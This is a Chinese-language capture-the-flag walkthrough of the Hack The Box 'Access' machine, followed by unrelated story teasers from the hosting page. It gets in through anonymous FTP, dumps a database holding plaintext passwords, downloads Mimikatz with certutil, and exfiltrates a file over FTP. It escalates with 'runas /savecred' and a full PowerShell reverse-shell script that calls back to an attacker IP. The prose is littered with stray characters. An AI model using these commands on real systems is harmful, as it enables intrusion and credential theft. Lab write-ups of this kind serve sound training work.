Hack The Box Access WriteUp

1.利用Anonymous匿名賬戶登錄服務(wù)器嗦随,可以看到兩個(gè)文件夾府框,一個(gè)是Backups,另一個(gè)是Engineer。在Backups文件夾下有backup.mdb的數(shù)據(jù)庫(kù)文件窍株,而Engineer中有Access Control.zip的壓縮文件煮落,將兩個(gè)文件下載回本地敞峭。
Ftp服務(wù)器

2.在kali環(huán)境中,可以利用mdb-tools工具套件來(lái)讀取.mdb文件蝉仇,例如:列出所有的表mdb-export backup.mdb旋讹,這里利用python將數(shù)據(jù)庫(kù)中所有信息導(dǎo)出

#!/usr/bin/python
# -*- coding: UTF-8 -*- 
import os

cmd = 'mdb-export backup.mdb '
table = 'acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx'

item_list = table.split(' ')

for item in item_list:
    print item
    c_cmd = cmd + item
    process = os.popen(c_cmd)
    output = process.read()
    process.close()
    table_file = open('backupdb/' + item,'w')
    table_file.write(output)
    table_file.close()
導(dǎo)出后的數(shù)據(jù)文件形式

3.在auth_user表中可以發(fā)現(xiàn)一組有用的用戶名密碼:engineer access4u@security
auth_user表

4.利用這個(gè)密碼可以去解密剛下載的壓縮包,壓縮包里是一個(gè).pst郵件格式文件轿衔,如果安裝了outlook可以很容易的打開(kāi)沉迹,如果沒(méi)有可以在kali中安裝evolution和evolution-plugins,readpst "Access Control.pst" 轉(zhuǎn)換pst為mbox文件害驹,mail -f "Access Control" 查看mbox文件鞭呕。在郵件中保存有另一組登錄帳號(hào):security 4Cc3ssC0ntr0ller,這組賬號(hào)可供telnet登錄使用裙秋。
郵件內(nèi)容

5.telnet登錄后在security的桌面拿下user.txt
telnet登錄

6.繼續(xù)滲透會(huì)發(fā)現(xiàn)服務(wù)器禁止了.exe程序的執(zhí)行琅拌,只能執(zhí)行部分系統(tǒng)指令,powershell是唯一可能的突破口摘刑,但同樣對(duì)運(yùn)行權(quán)限做了限制进宝,常用的Set-ExecutionPolicy Unrestricted限制繞過(guò)等指令都需要管理員權(quán)限。在當(dāng)前環(huán)境中可以用以下命令進(jìn)行上傳枷恕,下載党晋。下載功能是系統(tǒng)自帶,上傳需要用到ps1腳本徐块,在kali中我搭建了ftp用于接收文件未玻,雖然對(duì)本題并不能拿到線索,但也留個(gè)備份胡控,以后可能用到扳剿。
windows自帶下載命令:certutil -urlcache -split -f http://10.10.14.5/Invoke-Mimikatz.ps1
普通用戶執(zhí)行腳本:powershell -ExecutionPolicy ByPass -File new.ps1

#以下為Ftp上傳腳本PS1#
$ftp="ftp://10.10.14.5"  
$user="root"  
$pass="123456"   
$webclient = New-Object System.Net.WebClient  
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass) 
$name="Access.mdb"
$uri = New-Object System.Uri($ftp+"/"+$name+"")  
$webclient.UploadFile($uri,"C:/ZKTeco/ZKAccess3.5/Access.mdb")

7.提權(quán)的關(guān)鍵在于Runas命令,其中runas帶有 /savecred參數(shù)昼激,能夠以保存的用戶憑據(jù)執(zhí)行命令庇绽,所有在本地啟動(dòng)nc監(jiān)聽(tīng),一句話反彈runas /user:administrator /savecred "powershell -ExecutionPolicy ByPass -File C:\Users\Public\new.ps1"橙困,其中new.ps1是一段反彈powershell
runas參數(shù)
#以下是new.ps1反彈腳本#
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.5",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

8.最后在Administrator的桌面目錄中拿下root.txt
root.txt
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末瞧掺,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子凡傅,更是在濱河造成了極大的恐慌辟狈,老刑警劉巖,帶你破解...
    沈念sama閱讀 221,406評(píng)論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異哼转,居然都是意外死亡明未,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,395評(píng)論 3 398
  • 文/潘曉璐 我一進(jìn)店門壹蔓,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)亚隅,“玉大人,你說(shuō)我怎么就攤上這事庶溶。” “怎么了懂鸵?”我有些...
    開(kāi)封第一講書(shū)人閱讀 167,815評(píng)論 0 360
  • 文/不壞的土叔 我叫張陵偏螺,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我匆光,道長(zhǎng)套像,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 59,537評(píng)論 1 296
  • 正文 為了忘掉前任终息,我火速辦了婚禮夺巩,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘周崭。我一直安慰自己柳譬,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,536評(píng)論 6 397
  • 文/花漫 我一把揭開(kāi)白布续镇。 她就那樣靜靜地躺著美澳,像睡著了一般。 火紅的嫁衣襯著肌膚如雪摸航。 梳的紋絲不亂的頭發(fā)上制跟,一...
    開(kāi)封第一講書(shū)人閱讀 52,184評(píng)論 1 308
  • 那天,我揣著相機(jī)與錄音酱虎,去河邊找鬼雨膨。 笑死,一個(gè)胖子當(dāng)著我的面吹牛读串,可吹牛的內(nèi)容都是我干的聊记。 我是一名探鬼主播,決...
    沈念sama閱讀 40,776評(píng)論 3 421
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼爹土,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼甥雕!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起胀茵,我...
    開(kāi)封第一講書(shū)人閱讀 39,668評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤社露,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后琼娘,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體峭弟,經(jīng)...
    沈念sama閱讀 46,212評(píng)論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡附鸽,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,299評(píng)論 3 340
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了瞒瘸。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片坷备。...
    茶點(diǎn)故事閱讀 40,438評(píng)論 1 352
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖情臭,靈堂內(nèi)的尸體忽然破棺而出省撑,到底是詐尸還是另有隱情,我是刑警寧澤俯在,帶...
    沈念sama閱讀 36,128評(píng)論 5 349
  • 正文 年R本政府宣布竟秫,位于F島的核電站,受9級(jí)特大地震影響跷乐,放射性物質(zhì)發(fā)生泄漏肥败。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,807評(píng)論 3 333
  • 文/蒙蒙 一愕提、第九天 我趴在偏房一處隱蔽的房頂上張望馒稍。 院中可真熱鬧,春花似錦浅侨、人聲如沸纽谒。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 32,279評(píng)論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)佛舱。三九已至,卻和暖如春挨决,著一層夾襖步出監(jiān)牢的瞬間请祖,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,395評(píng)論 1 272
  • 我被黑心中介騙來(lái)泰國(guó)打工脖祈, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留肆捕,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,827評(píng)論 3 376
  • 正文 我出身青樓盖高,卻偏偏與公主長(zhǎng)得像慎陵,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子喻奥,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,446評(píng)論 2 359

推薦閱讀更多精彩內(nèi)容